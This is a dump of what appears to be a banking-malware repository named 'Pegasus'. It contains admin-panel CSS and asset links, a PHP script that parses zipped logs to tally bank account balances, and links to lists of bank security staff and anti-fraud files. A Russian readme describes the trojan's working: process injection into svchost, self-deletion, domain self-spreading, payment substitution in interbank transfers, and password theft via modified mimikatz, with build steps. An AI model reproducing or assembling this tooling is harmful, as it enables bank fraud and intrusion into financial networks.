-------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/my.css: -------------------------------------------------------------------------------- 1 | 2 | label, input { display:block; } 3 | input.text { margin-bottom:12px; width:95%; padding: .4em; } 4 | fieldset { padding:0; border:0; margin-top:5px; } 5 | 6 | pre { font-family: Lucida Console,Lucida Sans Typewriter,monaco,Bitstream Vera Sans Mono,monospace; font-size: 11px; line-height: 10px; } 7 | 8 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/pnotify.custom.min.css: -------------------------------------------------------------------------------- 1 | .ui-pnotify{top:25px;right:25px;position:absolute;height:auto;z-index:9999}html>body>.ui-pnotify{position:fixed}.ui-pnotify .ui-pnotify-shadow{-webkit-box-shadow:0 2px 10px rgba(50,50,50,.5);-moz-box-shadow:0 2px 10px rgba(50,50,50,.5);box-shadow:0 2px 10px rgba(50,50,50,.5)}.ui-pnotify-container{background-position:0 0;padding:.8em;height:100%;margin:0}.ui-pnotify-sharp{-webkit-border-radius:0;-moz-border-radius:0;border-radius:0}.ui-pnotify-title{display:block;margin-bottom:.4em;margin-top:0}.ui-pnotify-text{display:block}.ui-pnotify-icon,.ui-pnotify-icon span{display:block;float:left;margin-right:.2em}.ui-pnotify.stack-bottomleft,.ui-pnotify.stack-topleft{left:25px;right:auto}.ui-pnotify.stack-bottomleft,.ui-pnotify.stack-bottomright{bottom:25px;top:auto}.ui-pnotify-closer,.ui-pnotify-sticker{float:right;margin-left:.2em} 
-------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_diagonals-thick_18_b81900_40x40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_diagonals-thick_18_b81900_40x40.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_diagonals-thick_20_666666_40x40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_diagonals-thick_20_666666_40x40.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_flat_10_000000_40x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_flat_10_000000_40x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_glass_100_f6f6f6_1x400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_glass_100_f6f6f6_1x400.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_glass_100_fdf5ce_1x400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_glass_100_fdf5ce_1x400.png -------------------------------------------------------------------------------- 
/Pegasus/web-adminpart/res/ui-bg_glass_65_ffffff_1x400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_glass_65_ffffff_1x400.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_gloss-wave_35_f6a828_500x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_gloss-wave_35_f6a828_500x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_highlight-soft_100_eeeeee_1x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_highlight-soft_100_eeeeee_1x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_highlight-soft_75_ffe45c_1x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_highlight-soft_75_ffe45c_1x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_222222_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_222222_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_228ef1_256x240.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_228ef1_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_ef8c08_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_ef8c08_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_ffd27a_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_ffd27a_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_ffffff_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_ffffff_256x240.png -------------------------------------------------------------------------------- /bck_check/check.php: -------------------------------------------------------------------------------- 1 | ".fmt(GetVal($data, 'OutBal'))."
"; 56 | 57 | if ($context[GetVal($data, 'LastMovetDate')]['min'] == 0) { $context[GetVal($data, 'LastMovetDate')]['min'] = GetVal($data, 'EnterBal'); } 58 | if ($context[GetVal($data, 'LastMovetDate')]['max'] == 0) { $context[GetVal($data, 'LastMovetDate')]['max'] = GetVal($data, 'EnterBal'); } 59 | 60 | $context[GetVal($data, 'LastMovetDate')]['min'] = min($context[GetVal($data, 'LastMovetDate')]['min'], GetVal($data, 'EnterBal'), GetVal($data, 'OutBal')); 61 | $context[GetVal($data, 'LastMovetDate')]['max'] = max($context[GetVal($data, 'LastMovetDate')]['max'], GetVal($data, 'EnterBal'), GetVal($data, 'OutBal')); 62 | 63 | } 64 | 65 | 66 | 67 | // free mem 68 | unset($data); 69 | } 70 | 71 | 72 | 73 | /* 74 | Parses a single zip file - extracts files 75 | and send it to other parsers 76 | */ 77 | function ParseZip($fname, &$context) 78 | { 79 | // enum all files in that zip 80 | $zip = new ZipArchive; 81 | //open the archive 82 | if ($zip->open($fname) === TRUE) { 83 | //iterate the archive files array and display the filename or each one 84 | for ($i = 0; $i < $zip->numFiles; $i++) { 85 | 86 | // echo $zip->getNameIndex($i) . '
'; 87 | 88 | // read file contents into memory 89 | $fp = $zip->getStream($zip->getNameIndex($i)); 90 | 91 | // parse contents by file pointer 92 | if ($fp) { ParseFileContentsByFP($fp, $context); fclose($fp); } 93 | 94 | } // for files inside 95 | } else { 96 | echo "Failed to open {$fname}"; 97 | } 98 | 99 | $zip->close(); 100 | 101 | } 102 | 103 | set_time_limit(600); 104 | 105 | // results array context 106 | $context = array(); 107 | 108 | foreach (glob("./bck_logs/*/*.zip") as $fname) { 109 | //echo "{$fname}
"; 110 | ParseZip($fname, $context); 111 | // die(); 112 | } 113 | 114 | 115 | echo "

"; 116 | foreach ($context as $key => $val) { 117 | echo $key." -> ".fmt($val['min'])." - ".fmt($val['max'])."
"; 118 | 119 | } 120 | 121 | 122 | ?> -------------------------------------------------------------------------------- /cvs_banks/asv.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/asv.csv -------------------------------------------------------------------------------- /cvs_banks/fraud_basics.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/fraud_basics.txt -------------------------------------------------------------------------------- /cvs_banks/one.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/one.txt -------------------------------------------------------------------------------- /cvs_banks/plb.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/plb.csv -------------------------------------------------------------------------------- /cvs_banks/АНТИФРАУД.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/АНТИФРАУД.txt -------------------------------------------------------------------------------- /cvs_banks/Антидропы (485) 24 08 2015.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Антидропы (485) 24 08 2015.xls -------------------------------------------------------------------------------- /cvs_banks/Антидропы (500) 30 06 
2015.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Антидропы (500) 30 06 2015.xls -------------------------------------------------------------------------------- /cvs_banks/Нипбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Нипбанк.csv -------------------------------------------------------------------------------- /cvs_banks/СБ Липецк на 17.11.2015.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/СБ Липецк на 17.11.2015.doc -------------------------------------------------------------------------------- /cvs_banks/Список СБ банков г. Воронежа на 13.02.2013 (со списком рассылки).doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Список СБ банков г. 
Воронежа на 13.02.2013 (со списком рассылки).doc -------------------------------------------------------------------------------- /cvs_banks/акбарс.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/акбарс.csv -------------------------------------------------------------------------------- /cvs_banks/акрополь.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/акрополь.csv -------------------------------------------------------------------------------- /cvs_banks/генбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/генбанк.csv -------------------------------------------------------------------------------- /cvs_banks/икбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/икбанк.csv -------------------------------------------------------------------------------- /cvs_banks/интерпромбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/интерпромбанк.csv -------------------------------------------------------------------------------- /cvs_banks/металинвестбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/металинвестбанк.csv -------------------------------------------------------------------------------- /cvs_banks/минбанк.csv: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/минбанк.csv -------------------------------------------------------------------------------- /cvs_banks/невский.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/невский.csv -------------------------------------------------------------------------------- /cvs_banks/рсхб.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/рсхб.csv -------------------------------------------------------------------------------- /gen_payments_script/gen1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/gen_payments_script/gen1.php -------------------------------------------------------------------------------- /readme.txt: -------------------------------------------------------------------------------- 1 | Проект Пегас - краткое описание содержимого 2 | 3 | Пегас - структурированный сложный проект под х32 и х64 платформы. 4 | Установщик инжектирует в память процесса svchost образ с ядром системы и модулями, после чего выполняется 5 | самоудаление с затиранием исходного файла. 6 | Передача управления в исходном инсталлере идет следующим образом: 7 | Shellcode -> InstallDispatcherDll 8 | Передача управления в новом процессе идет по схеме: 9 | Shellcode -> WorkDispatcherDll -> все остальные модули 10 | При установке поверх существующей версии выполняется контроль айди билда, и если он ниже или равен уже 11 | существующей версии - установка не выполняется. 
12 | Подробности функционирования модулей потребуют значительного времени для описания, поэтому в случае необходимости 13 | предлагается смотреть исходники - они хорошо откомментированы и структурированы. 14 | 15 | Для сборки нужна студия не ниже 2013 и PHP Tools for Visual Studio от Devsense 16 | 17 | Размещение файлов по папкам 18 | 19 | binres 20 | Скомпилированные модули и другой код под х32 и х64 платформы 21 | 22 | BUILDS 23 | Финальные установщики под обе платформы, отладочная и релизная версии в зависимости от папки 24 | 25 | inc 26 | Программные модули (библиотеки), используемые различными подпроектами 27 | 28 | InstallDispatcherDll 29 | Модуль-установщик, выполняет инжект в новый процесс 30 | 31 | InstallerExe 32 | Проект начального установщика 33 | 34 | lib 35 | Файлы для успешной компиляции без MSVCRT 36 | 37 | LZ4_pack 38 | Утилита упаковки ресурсов 39 | 40 | mod_CmdExec 41 | Модуль запуска команд из панели (новый процесс, команда в консоли и т.п.) 42 | 43 | mod_DomainReplication 44 | Модуль самораспространения в домене 45 | 46 | mod_KBRI 47 | Модуль подмены платежей в КБР 48 | 49 | mod_KBRI_hd 50 | Модуль-инжектор для перехвата процесса обмена данными КБР и получения от mod_KBRI подмененных данных 51 | 52 | mod_LogonPasswords 53 | Модуль поиска паролей, переписанный и исправленный код mimikatz 54 | 55 | mod_NetworkConnectivity 56 | Модуль сетевой связи, в том числе через пайпы для машин с закрытым доступом в сеть 57 | 58 | RemoteServiceExe 59 | Специальный исполняемый файл, который забрасывается на удаленную систему в процессе распространения в домене 60 | 61 | shared 62 | Общие заголовочные и конфигурационные файлы 63 | 64 | Shellcode 65 | Шеллкод для загрузки и запуска присоединенных библиотек 66 | 67 | tools 68 | Утилиты и скрипты для сборки проекта и его частей 69 | 70 | WEB 71 | Клиентская часть админ-панели, интегрирована в проект студии 72 | 73 | web-adminpart 74 | Админская часть панели, копия с сервера разработки 75 | 76 | WorkDispatcherDll 
77 | Модуль ядра системы 78 | 79 | 80 | В общем случае конфигурируется сначала \shared\config.h, затем собирается через скрипт \tools\MAKE_INSTALLERS.BAT 81 | с параметром Release или Debug 82 | Готовые билды в \BUILDS\ 83 | 84 | --------------------------------------------------------------------------------